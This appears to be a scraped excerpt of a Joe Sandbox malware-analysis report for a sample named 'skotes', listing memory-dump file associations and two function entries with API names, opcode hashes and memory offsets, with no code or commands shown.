                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: pContext
                                                                                                                                                                                                                                                  • API String ID: 548886458-2046700901
                                                                                                                                                                                                                                                  • Opcode ID: bde461d41925fab198f1ebf9715a26e604cfc675212e125f428f62b363632abc
                                                                                                                                                                                                                                                  • Instruction ID: d9c601ea77e26f43da6be35c1aed233d8521893258e2436ec34d5a2257f3496d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bde461d41925fab198f1ebf9715a26e604cfc675212e125f428f62b363632abc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DE09B3DB00104A7CB04F7A5D849D9DBB799E95714714412FF511A3351EB78A905C6E8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004934FC
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: pScheduler$version
                                                                                                                                                                                                                                                  • API String ID: 2141394445-3154422776
                                                                                                                                                                                                                                                  • Opcode ID: 348d4944b0515179f4c8c57879fad3842d38bafc3e5aa672f707afad9b8a556d
                                                                                                                                                                                                                                                  • Instruction ID: 143da73a3babbe8e123f8ed92e5d9f5a910543074039438e331fea0e5d7894a5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 348d4944b0515179f4c8c57879fad3842d38bafc3e5aa672f707afad9b8a556d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8DE08034440208B6CF25FF95D44BFCD7B54971274AF14C13BB811111929BBC5798C69D